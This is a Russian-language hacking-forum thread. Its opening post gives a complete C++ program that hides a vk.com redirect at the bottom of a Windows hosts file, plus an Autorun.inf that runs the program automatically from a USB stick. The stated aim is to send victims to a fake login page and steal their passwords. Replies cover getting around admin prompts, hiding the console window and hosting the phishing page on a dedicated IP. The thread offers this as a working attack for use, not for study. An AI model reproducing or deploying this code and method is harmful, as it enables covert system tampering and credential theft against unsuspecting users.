Перейти к содержимому

   

Подмена hosts с флешки


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 18

#1
Agresor

Agresor

    Продвинутый

  • Пользователи
  • PipPipPip
  • 56 сообщений

Как сделать так, чтобы hosts
подменился автоматически? Скажем
прийти к кому-нибудь с флешкой, а
уйти с паролем Для этого мы будем использовать язык С++.
Возможно кто-то даже не знает с чего
начать. Для этого я расскажу как
написать это на Dev C++.
Я выбрал эту среду, потому-что она
быстрая, легкая и удобная. + весит
13 мегабайт всего Если у кого-то уже установлены Visual Studio , или
борланды всякие, то ничего
страшного Си и в Африке Си. Открываем Dev-C++. Жмем "Файл",
"Создать", "Исходный файл".
Появляется чистый лист. Начинаем
писать КОД:

 

#include <iostream> //стандартный
поток ввода/вывода.
#include <fstream>//для работы с
файлами
using namespace std;// используем по
умолчанию пространство имен std. int main(){/*это главная функция. Она
у нас ничего не возвращает, но типом
главной функции может быть только
int. void нельзя.*/
freopen("C:/WINDOWS/system32/
drivers/etc/hosts","at",stdout); /* тут мы делаем переадресацию iostream
на fstream с ключом дозаписи.*/
unsigned int a = 0; // создаём
переменную счетчик.
while(a<=1000){ //создаём цикл
a++; //который заполняет файл hosts cout<<"\n"; //тысячью пустых строк
}
cout<<"127.0.0.1 vk.com"; // это
строка переадресации
}


Теперь у нас есть код,
его надо скомпилировать. Жмем
"Выполнить", "Скомпилировать".
Теперь в папке которую мы указали
есть exe файл. Если его запустить тогда ваш файл hosts допишется.
Можете проверить. Сейчас надо
сделать чтобы в тот момент когда вы
вставляете флешку, автоматически
запускалась эта программа. Для этого
переносим получившуюся программу к себе на флешку. Далее создаем на
флешке файл Autorun.inf .
Открываем его блокнотом и пишем
КОД:
 

[AutoRun]
shellexecute=название_программы
Action=то_что_будет_писаться_до_автозапуска
Icon=иконка
Label=название_флешки.


теперь как мы только в компьютер
где стоит винда вставим флешку,
откроется программа которая
изменит файл hosts. И сразу
закроется. После этого жертва при
попытке зайти ,например в Вконтакт откроет фейковую страницу,куда
введет логин и пароль, после чего эти
две строки попадут к вам.


  • Agresor, Clay и sokal1717 это нравится

#2
Clay

Clay

    Новичок

  • Пользователи
  • Pip
  • 5 сообщений
Выложить отдельно код без комментариев.

#3
Agresor

Agresor

    Продвинутый

  • Пользователи
  • PipPipPip
  • 56 сообщений

hosts успешно подменяется,но есть проблема при загрузке страницы с фейком ....она не грузится,в чом проблема незнаю,возможно из-за безплатного хостинга.


  • sokal1717 это нравится

#4
sokal1717

sokal1717

    Новичок

  • Пользователи
  • Pip
  • 4 сообщений

Можешь код скинуть без комментариев?!



#5
z0rg1n

z0rg1n

    Продвинутый

  • Модераторы
  • 242 сообщений
  • ГородЧто сюда писать? 0_о
Для записи в хост, окна просят права админа. Поговаривают, что в реестре есть путь до этого файла и для изменения пути, окна не просят админа.

#6
Agresor

Agresor

    Продвинутый

  • Пользователи
  • PipPipPip
  • 56 сообщений

Для записи в хост, окна просят права админа. Поговаривают, что в реестре есть путь до этого файла и для изменения пути, окна не просят админа.

нет не нужно прав админа по крайней мере я тестил все збс было , на 1сек вылазит око cmd и все



#7
4v3ng3r

4v3ng3r

    Продвинутый

  • Пользователи
  • PipPipPip
  • 132 сообщений

while(a<=1000){ //создаём цикл
a++; //который заполняет файл hosts cout<<"\n"; //тысячью пустых строк
}

 

А где, собственно, сам процесс ввода в файл? я вижу только инкремент а



#8
4v3ng3r

4v3ng3r

    Продвинутый

  • Пользователи
  • PipPipPip
  • 132 сообщений

Если бы это перенаправление само убиралось, через некоторое время, было бы круто.



#9
z0rg1n

z0rg1n

    Продвинутый

  • Модераторы
  • 242 сообщений
  • ГородЧто сюда писать? 0_о


Для записи в хост, окна просят права админа. Поговаривают, что в реестре есть путь до этого файла и для изменения пути, окна не просят админа.

нет не нужно прав админа по крайней мере я тестил все збс было , на 1сек вылазит око cmd и все
1 сек ?!?! Это очень долго. Могу сделать тоже самое, но без консоли. Интересует? Пиши в лс.

#10
z0rg1n

z0rg1n

    Продвинутый

  • Модераторы
  • 242 сообщений
  • ГородЧто сюда писать? 0_о

while(a<=1000){ //создаём цикл
a++; //который заполняет файл hosts cout<<"\n"; //тысячью пустых строк
}

А где, собственно, сам процесс ввода в файл? я вижу только инкремент а

Я в полюсах не селен, но там ведь поток записи открыт, а \n переносит на новую строку

#11
Agresor

Agresor

    Продвинутый

  • Пользователи
  • PipPipPip
  • 56 сообщений

Делай,и выложы на форум,интересно)

#12
z0rg1n

z0rg1n

    Продвинутый

  • Модераторы
  • 242 сообщений
  • ГородЧто сюда писать? 0_о

Делай,и выложы на форум,интересно)

Я только на c# могу.
Делать в виде гайда или проект?



#13
Agresor

Agresor

    Продвинутый

  • Пользователи
  • PipPipPip
  • 56 сообщений

while(a<=1000){ //создаём цикл
a++; //который заполняет файл hosts cout<<"\n"; //тысячью пустых строк
}

А где, собственно, сам процесс ввода в файл? я вижу только инкремент а

Я в полюсах не селен, но там ведь поток записи открыт, а \n переносит на новую строку
Ет для того чтобы переадресация была в самом низу хостс ,чтобы не было видно.
Проверь пж сам как роботает,потом отпишеш)ок

#14
Agresor

Agresor

    Продвинутый

  • Пользователи
  • PipPipPip
  • 56 сообщений


Делай,и выложы на форум,интересно)

Я только на c# могу.
Делать в виде гайда или проект?
Гайд

#15
z0rg1n

z0rg1n

    Продвинутый

  • Модераторы
  • 242 сообщений
  • ГородЧто сюда писать? 0_о

 

 

Делай,и выложы на форум,интересно)

Я только на c# могу.
Делать в виде гайда или проект?
Гайд

 

Окей. Через часок сделаю.


  • Agresor это нравится

#16
z0rg1n

z0rg1n

    Продвинутый

  • Модераторы
  • 242 сообщений
  • ГородЧто сюда писать? 0_о

 

 

Делай,и выложы на форум,интересно)

Я только на c# могу.
Делать в виде гайда или проект?
Гайд

 

Кря  Это только первая чать. Если понравится не только тебе, буду продолжать.


  • Vronsice это нравится

#17
Agresor

Agresor

    Продвинутый

  • Пользователи
  • PipPipPip
  • 56 сообщений


Делай,и выложы на форум,интересно)

Я только на c# могу.
Делать в виде гайда или проект?
Гайд
Кря Это только первая чать. Если понравится не только тебе, буду продолжать.
Збс !)

#18
gartos

gartos

    Новичок

  • Пользователи
  • Pip
  • 2 сообщений

hosts успешно подменяется,но есть проблема при загрузке страницы с фейком ....она не грузится,в чом проблема незнаю,возможно из-за безплатного хостинга.


Скорее всего так оно и есть, тебе нужен платный хостинг с выделенным IP(у бесплатных нет выделенных ip),и этот выделенный IP ты дописываешь в хост.
  • Agresor это нравится

#19
Agresor

Agresor

    Продвинутый

  • Пользователи
  • PipPipPip
  • 56 сообщений

 

hosts успешно подменяется,но есть проблема при загрузке страницы с фейком ....она не грузится,в чом проблема незнаю,возможно из-за безплатного хостинга.


Скорее всего так оно и есть, тебе нужен платный хостинг с выделенным IP(у бесплатных нет выделенных ip),и этот выделенный IP ты дописываешь в хост.

 

я так и думал , лень былопокупать для теста






Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных